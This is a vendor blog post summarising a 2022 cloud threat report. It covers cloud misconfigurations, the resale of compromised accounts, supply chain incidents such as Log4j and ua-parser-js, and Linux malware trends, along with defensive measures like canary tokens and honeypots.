Security in the cloud continues to prove a challenge for organizations around the world.
Threat actors are refining their techniques to gain illicit access to cloud data and resources. They never miss an opportunity to cash in, whether they take advantage of common cloud configuration mistakes, target software supply chains, or adapt malware to evade detection. However, with cloud-based versions of tried-and-true defensive techniques like canary tokens and honeypots; defenders can use the power of the cloud to re-level the playing field. We’ve written up our discoveries in our bi-annual Cloud Threat Report Vol.3 which is available here.
Cloud Security Posture
Docker APIs continue to be an enticing and abundant target for adversaries. Specifically, compromising Docker sockets and deploying malicious container images, some of which are being downloaded and deployed by thousands of unsuspecting users, ultimately leading to cryptomining infections.
Cloud security posture management is one of the most important aspects of cloud security, though it continues to be a challenging problem to solve. Labs found 72% of environments contain insecure configurations, and half of all cloud infrastructure does not require Multifactor Authentication for delete operations. Access to compromised cloud assets is now more attainable than ever with the proliferation of cloud access brokers.
The Business Model of Cloud Access Brokers
Expanding upon our cybercrime research from the last report, we dug deeper into the specifics regarding the business models of how initial access is sold, pricing structures, marketplaces, and their target market verticals.
On average, the price of a compromised AWS account goes for roughly $40, with corporate accounts being offered for as low as $300 and upwards of $30k. However, while AWS is one of the most popular cloud services providers, they make up only 16% of overall hosting account resale in our findings. Hostgator and Bluehost combined makeup half of all web hosting accounts listed for sale.
Vulnerabilities and Software Supply Chain
In October 2021, a ua-parser-js developer’s NPM account was compromised and used to push a malicious update to the package. This malicious update opened up Linux systems to receive and run the open-source cryptocurrency miner, XMRig. Confluence also suffered a significant vulnerability, CVE-2021-26084, allowing unauthenticated users to execute arbitrary commands on Linux servers.
However, these issues pale in comparison to the vulnerabilities surrounding Log4j, which elevated this popular Java library to the forefront of the technology industry as 2021 came to a close. This library is used extensively across all types of software and touches nearly every industry vertical. Across our dataset, 31% of malware infections that we tracked during this period stemmed from Log4j exploitation as the initial infection vector.
Issues affecting the software supply chain continue to highlight the importance of software bill of materials, asset management, ability to patch quickly, and a general sense of skepticism around novel activities observed within the environment. Understand what you have, where it resides, and baseline standard behaviors to catch subtle tradecraft.
Linux Malware and the Cloud
Over the past six months, XMRig, Muhstik, and Mirai dominated the cloud, accounting for a combined 74% of the malware infections we observed.
Aside from the usual suspects, Labs uncovered PYSA had begun to modify their ChaChi malware to affect Linux, which is unique given they had primarily been a Windows-focused ransomware group. This variant is an open-source Golang-based RAT that leverages DNS tunneling for Command and Control.
HCRootkit or Susteru has been hard at work improving their malware and delivery processes. The latest Linux variant bypassed most endpoint security software and allowed for a seamless and capable backdoor into impacted assets.
Proactive Defense and Intelligence
In addition to tracking adversaries, the Labs team focused on vulnerability discovery and process improvements to help further the collective durability of cloud infrastructure. This research provides insight around effectively leveraging canary tokens within AWS to highlight compromised cloud credentials. Honeypots, in general, are a crucial addition to any organization; however, they are often challenging to create and maintain. For this reason, Labs examined using a Docker registry with constraints to safely deploy actual application code within honeypots and effectively streamline honeypot creation, deployment, and monitoring.
Lastly, the Labs team discovered and responsibly disclosed a privilege escalation vulnerability within Automox’s Windows patch management software. This vulnerability is assigned CVE-2021-43326 and has been mitigated in the latest version of their agent.
To learn about these findings and more, check out the full Lacework 2022 Cloud Threat Report Volume 3.